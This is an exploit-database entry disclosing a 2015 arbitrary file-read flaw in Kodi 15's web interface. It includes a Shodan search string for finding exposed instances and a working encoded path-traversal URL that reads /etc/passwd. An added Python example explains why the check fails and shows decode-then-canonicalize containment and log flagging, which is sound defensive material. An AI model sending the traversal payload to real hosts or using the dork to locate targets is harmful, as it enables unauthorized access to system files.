0day Today Exploits Market and 0day Exploits Database

Kodi 15 - Arbitrary File Access (Web Interface) Vulnerability

Author
Machiel Pronk
Risk
Security Risk High
0day-ID
0day-ID-24635
Category
web applications
Date add
01-12-2015
Platform
linux
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
 
The Kodi web interface is vulnerable to arbitrary file read.

Example (for /etc/passwd):
<ip>:<port>/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
 
(Issue fixed in 2012, reintroduced in February 2015. Fixed again November 2015 for v16.)
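
The general ordering problem behind encoded-slash requests like the one above, as an added example (not Kodi's code and not part of the original report, which does not describe Kodi's handler): a traversal check that runs before percent-decoding, beside one that decodes, canonicalizes and then enforces containment. `WEB_ROOT`, the function names and the sample request paths are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/webroot"  # constructed placeholder, not Kodi's real web root

def naive_resolve(raw_path):
    """Weak pattern: filter '..' segments on the raw path, decode afterwards."""
    if ".." in raw_path.split("/"):
        return None
    # '%2f..%2f..' contains no literal '/', so it passed the check above as a
    # single segment; decoding now turns it into real '/../' components.
    decoded = unquote(raw_path)
    return posixpath.normpath(WEB_ROOT + "/" + decoded)

def safe_resolve(raw_path):
    """Decode first, canonicalize, then require the result to stay in WEB_ROOT."""
    decoded = unquote(raw_path)
    if "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    # Containment is checked on the final path, whatever encoding produced it.
    # A server touching the real filesystem would also resolve symlinks
    # (os.path.realpath) before this comparison.
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate

def flag_requests(paths):
    """Return the request paths a log review should flag as escaping WEB_ROOT."""
    return [p for p in paths if safe_resolve(p) is None]

# Constructed request paths, same shape as the request in the report.
ENCODED = "/%2f..%2f..%2f..%2fetc%2fpasswd"
SAMPLE_REQUESTS = ["/index.html", "/js/../index.html", ENCODED]

if __name__ == "__main__":
    for path in SAMPLE_REQUESTS:
        print(path, "| naive:", naive_resolve(path), "| safe:", safe_resolve(path))
    print("flagged:", flag_requests(SAMPLE_REQUESTS))
```
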
